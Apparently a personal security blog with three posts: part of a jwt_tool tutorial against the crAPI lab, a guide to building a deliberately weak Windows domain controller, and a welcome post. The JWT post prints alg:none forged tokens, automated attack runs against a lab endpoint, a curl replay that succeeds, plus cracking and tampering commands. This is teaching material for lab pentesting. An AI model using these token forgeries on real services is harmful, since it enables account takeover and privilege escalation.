    $ jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw
    
    [jwt_tool ASCII-art banner]
    Version 2.2.7    @ticarpi
    
    Original JWT: 
    
    =====================
    Decoded Token Values:
    =====================
    
    Token header values:
    [+] alg = "RS256"
    
    Token payload values:
    [+] sub = "sambam@test.com"
    [+] iat = 1738376057    ==> TIMESTAMP = 2025-01-31 18:14:17 (UTC)
    [+] exp = 1738980857    ==> TIMESTAMP = 2025-02-07 18:14:17 (UTC)
    [+] role = "user"
    
    Seen timestamps:
    [*] iat was seen
    [*] exp is later than iat by: 7 days, 0 hours, 0 mins
    
    ----------------------
    JWT common timestamps:
    iat = IssuedAt
    exp = Expires
    nbf = NotBefore
    ----------------------
    

    Key Takeaways

    The alg field is RS256, an asymmetric algorithm.

    The payload contains:

    • User email (sub)
    • Role (role)
    • Expiration (exp) and issued-at (iat) timestamps.

    The token expires exactly one week after it was issued, which gives an attacker a long window to use it if it’s stolen.

    Now that we know the structure of the JWT, we can move on to attempting to exploit it.

    Attacking JWTs with jwt_tool

    jwt_tool supports several known vulnerabilities:

    -X EXPLOIT, --exploit EXPLOIT
      a = alg:none
      n = null signature
      b = blank password accepted in signature
      s = spoof JWKS
      k = key confusion
      i = inject inline JWKS
    

    Implementing common attacks

    Implementing the attack is as easy as specifying the exploit type after -X and passing the token:

    $ jwt_tool -X a eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw      
    
    Original JWT: 
    
    jwttool_8a4cbc131e033f290781421c336d8fd6 - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJub25lIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.
    jwttool_2813749d10e5d6c29323a6692ca1f54d - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJOb25lIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.
    jwttool_5c1c85acbe085c8ae4d19f8ab95a80a8 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJOT05FIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.
    jwttool_a1d09fe0d0447b23f0c178179d023c9a - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
    (This will only be valid on unpatched implementations of JWT.)
    [+] eyJhbGciOiJuT25FIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ
    

    As you can see, jwt_tool modifies the algorithm with various forms of none.

    If the server accepts one of these tokens, then we don’t need to supply a valid signature. And if the token doesn’t need to be signed, we can modify it however we want, leading to some interesting exploits.

    For example, I could change the payload’s sub value to another user’s email, or change my account’s role to admin.

    Now, hopefully, you see why JWT security is so important…

    Automating attacks

    Manually validating JWT attacks can be tedious. You’d have to copy-paste each modified JWT and repeat requests over and over…

    But with the -t option, you can tell jwt_tool to make the requests on your behalf:

    jwt_tool -t 'http://vulnapi:8888/identity/api/v2/user/dashboard' -rh 'Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw' -X a -np
    
    ...
    
    jwttool_5811c6f0d08e43fa738d7e2061063ed8 Exploit: "alg":"none" Response Code: 200, 184 bytes
    jwttool_ade262ee8d95d64477d4bf7f8ebbb556 Exploit: "alg":"None" Response Code: 404, 58 bytes
    jwttool_d08330cedd977600a7cb817c4a273f01 Exploit: "alg":"NONE" Response Code: 404, 58 bytes
    jwttool_61a4d6650b88610d593f5440e032cead Exploit: "alg":"nOnE" Response Code: 404, 58 bytes
    

    If the response code is 200, the attack likely worked. But, it’s best to check by making a request with another tool like curl or Burpsuite.
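
    For example, replaying the first "alg":"none" token from above against the same dashboard endpoint might look something like this:

    $ curl -s -o /dev/null -w '%{http_code}\n' \
        -H 'Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.' \
        'http://vulnapi:8888/identity/api/v2/user/dashboard'
    200

    A 200 here confirms the server really did accept the unsigned token.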

    Even more automation!

    Here’s where things get really interesting!

    Instead of testing exploits one by one, you can use the pb (playbook) mode to run multiple tests:

    $ jwt_tool -t 'http://vulnapi:8888/identity/api/v2/user/dashboard' -rh 'Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw' -M pb
    

    jwt_tool will then send a request to test each common exploit. It then goes even further to attempt to crack the JWT with a default wordlist. How cool is that!?

    It may be best to save the output to a file as a ton of information is returned. As with the -t parameter, successful responses can indicate potential vulnerabilities.
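
    One easy way to do that is to tee the output (the jwt_tool arguments are the same as before; <token> stands in for the full JWT):

    $ jwt_tool -t 'http://vulnapi:8888/identity/api/v2/user/dashboard' -rh 'Authorization: Bearer <token>' -M pb | tee jwt_playbook_results.txt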

    Cracking JWT Secrets

    As I mentioned earlier during the pb scan, jwt_tool can crack JWT secrets.

    From earlier analysis, we know that the JWT is signed asymmetrically, meaning it is signed with a public/private key pair rather than a shared secret phrase. So, we can’t just crack crAPI’s secret.

    But it’s worth noting how jwt_tool does this anyway. You can specify crack mode with -C and a wordlist with -d:

    $ jwt_tool -C -d <wordlist> <JWT>

    This is relatively quick as it is an offline attack.

    But, I would save this for after you’ve exhausted common exploits.

    Tampering JWTs

    If all else fails, jwt_tool allows interactive token modification:

    $ jwt_tool -T
    
    Token header values:
    [1] alg = "RS256"
    [2] *ADD A VALUE*
    [3] *DELETE A VALUE*
    [0] Continue to next step
    
    Please select a field number:
    (or 0 to Continue)
    >

    This lets you manually modify header and payload values, useful for creative exploit attempts.

    Conclusion

    We explored JWT vulnerabilities in crAPI using jwt_tool, covering:

    • JWT structure and interception
    • Exploiting common vulnerabilities
    • Automating attacks and scanning
    • Cracking and tampering JWTs

    Understanding JWT security is essential for finding and mitigating vulnerabilities. So, I highly recommend you learn about JWTs in depth.

    Hope this post helps you on your web pentesting journey!

    Happy hunting!

  • Windows Break ‘N Build Pt. 1 – Setting Up a Vulnerable Domain Controller

    Introduction

    In Part 0, we set up our lab environment by installing VirtualBox, downloading the Windows Server 2025 ISO, and configuring the virtual machine to boot from the ISO. If you haven’t completed those steps, go back to Part 0 for a full walkthrough.

    Now, in Part 1, we’ll focus on setting up the Windows Server VM as a Domain Controller (DC). This DC will serve as the foundation of our lab, where we’ll explore AD attacks and defenses. By the end of this post, you’ll have a fully operational DC we’ll eventually use for some purple-team endeavors.

    Server Installation

    Initial Configuration

    Boot the VM you configured in Part 0. You should see the Windows Server installation screen.
    If this screen doesn’t appear, revisit Part 0 to fix any issues.

      Select your preferred language and keyboard layout to proceed.

  When prompted for the installation type, choose Standard Evaluation (no Desktop Experience). The Standard edition supports up to two VMs, which is sufficient for our use.

      Accept the license agreement and click next (because you have no other option!).

      Use the default settings for installation location; partitioning is unnecessary for our setup.

      Let the installer run. If it fails, you may want to try increasing the allocated disk space for the VM.

      Post-Installation Steps

      After the VM reboots, you’ll be prompted to set the Administrator password. For this guide, we’ll use Password123 (remember, this is an intentionally vulnerable DC – we’re throwing security out the window)!

      Log in, then, you’ll be prompted to configure diagnostic data collection. Select Required to continue.

      Once logged in, you’ll be greeted by the sconfig menu, which simplifies server management tasks.

      Change Computer Name (Optional)

      Renaming the server can make it easier to identify in a lab with multiple VMs.

      In sconfig, select Option 2 to rename the server. For this example, use VULN-DC.

      Restart the server when prompted to apply the new name.

      Promoting the Server to a Domain Controller

      Install Active Directory Domain Services (AD DS)

      From the sconfig menu, choose Option 15 to open PowerShell.

      Install AD DS by running:

      Install-WindowsFeature -Name AD-Domain-Services 

      Ensure the VM is connected to the internet during this process. The default VirtualBox NAT connection should suffice.

        Set Up a New Forest

        Promote the server to a Domain Controller and create a new forest with the following command:

          Install-ADDSForest -DomainName "vuln.local"

          During the process, you’ll be prompted to set a Directory Services Restore Mode (DSRM) password. I used the same password as the Administrator account for simplicity. Remember, we’re sacrificing security on purpose.

          Confirm the reboot when prompted by typing Y.

          After the server restarts, verify the domain promotion. Use sconfig Option 1 to confirm that the server name reflects the new domain (e.g., vuln.local).

          By default, the server will also act as a DNS server. To confirm this, return to PowerShell and run:

          ipconfig /all

          Configure Static IP

          Setting a static IP ensures consistent communication within your lab network.

          In VirtualBox, open the VM settings.

            Navigate to the Network tab and attach a Host-Only Adapter.

            If no host-only network exists, create one via File > Tools > Network Manager.

            Inside the VM, use sconfig Option 8 to configure the network adapter.

            Then, choose the network adapter (5 in my case):

            Assign a static IP (e.g., 192.168.56.10), subnet mask (255.255.255.0), and DNS server IP (same as the server’s IP).

            Verify connectivity by pinging the static IP from your host machine.

            Adding Domain Users

            Simulate an initial compromise by creating a standard domain user.

            Open PowerShell using sconfig Option 15.

            Create a new domain user with the following command:

             net user /add <username> <password> /domain

            I created the user johnnyappleseed with password iLikeApples!

            Verify the user was created successfully: net user. Your newly created user should be listed as part of the output.

              Optional SSH Configuration

              I usually ssh into my VMs, especially if there is no GUI to interact with. It’s easier to copy-paste commands, plus, I just like my native terminal better.

              If you prefer managing the VM via SSH, follow these steps:

              Start the OpenSSH server and enable it to start automatically:

               Start-Service sshd
               Set-Service -Name sshd -StartupType Automatic

              Edit the SSH configuration file (C:\ProgramData\ssh\sshd_config) to enable password authentication. Use notepad.exe to modify the file:

              Locate and set PasswordAuthentication to yes.

              I went ahead and enabled public key authentication as well.

              Restart the SSH service to enable the settings:

               Restart-Service sshd

              If you’re not able to connect, make sure the firewall allows inbound SSH connections:

               Get-NetFirewallRule | Where-Object { $_.Name -like '*SSH*' }

              In my case, inbound SSH connections were allowed, but only in private networks:

              PS C:\Users\Administrator> Get-NetFirewallRule | Where-Object { $_.Name -like '*SSH*' }
              
              Name                          : OpenSSH-Server-In-TCP
              DisplayName                   : OpenSSH SSH Server (sshd)
              Description                   : Inbound rule for OpenSSH SSH Server (sshd)
              ...
              Enabled                       : True
              Profile                       : Private
              Platform                      : {}
              Direction                     : Inbound
              Action                        : Allow
              ...

               I guess the host-to-guest connection through a host-only adapter counts as a Public network. Updating the rule fixed my connectivity issues:

              Set-NetFirewallRule -DisplayName "OpenSSH SSH Server (sshd)" -Profile Public

              Test the SSH connection from your host machine to the VM.
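
               From the host, that check is as simple as (using the static IP we assigned earlier):

               $ ssh Administrator@192.168.56.10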

                Conclusion

                In Part 1, we set up a Windows Server VM, promoted it to a Domain Controller, created a domain user, and optionally configured SSH for easier access. This establishes a solid foundation for learning Windows AD attacks and defenses.

                 Next, we’ll dive into implementing some common misconfigurations so that we can exploit them, then fix them. It’s about to get interesting, so stay tuned for Part 2!

              • Welcome to my Blog!

                This being the first post, I just wanted to write a quick introduction to the
                different topics I’m going to write about and some reasons why I wanted to
                start my own blog. So, without further ado, let’s get into it!

                Why start a blog?

                Initially, I wanted to start a blog because I thought it would be a fun project to work on. I had just finished working on my
                portfolio site and wanted to expand upon it, so I thought “why
                not?” I also thought it would be pretty cool to have my own blog.
                I’m not expecting many people to read it, but posting your
                thoughts to an audience as wide as the internet is a pretty
                powerful thing.

                I also want to use this blog to build on my knowledge. One of the
                best ways to learn something confidently is to teach, so I’ll be
                posting tutorials here as well.

                Main topics

                As stated earlier, the main focus of this blog will be tutorials
                that will help me solidify my learning. Daniel Miessler’s blog
                is an excellent example of what I hope to one day achieve.

                Outside of this, I’d like to write about my experiences in my
                career and life in general. This could be in the form of career advice,
                life updates, or anything else I feel like writing about.

                This is my space where I have the freedom to post whatever I want and I
                can’t wait to share more with you!

                So, welcome to my blog and thank you for starting this journey with me :).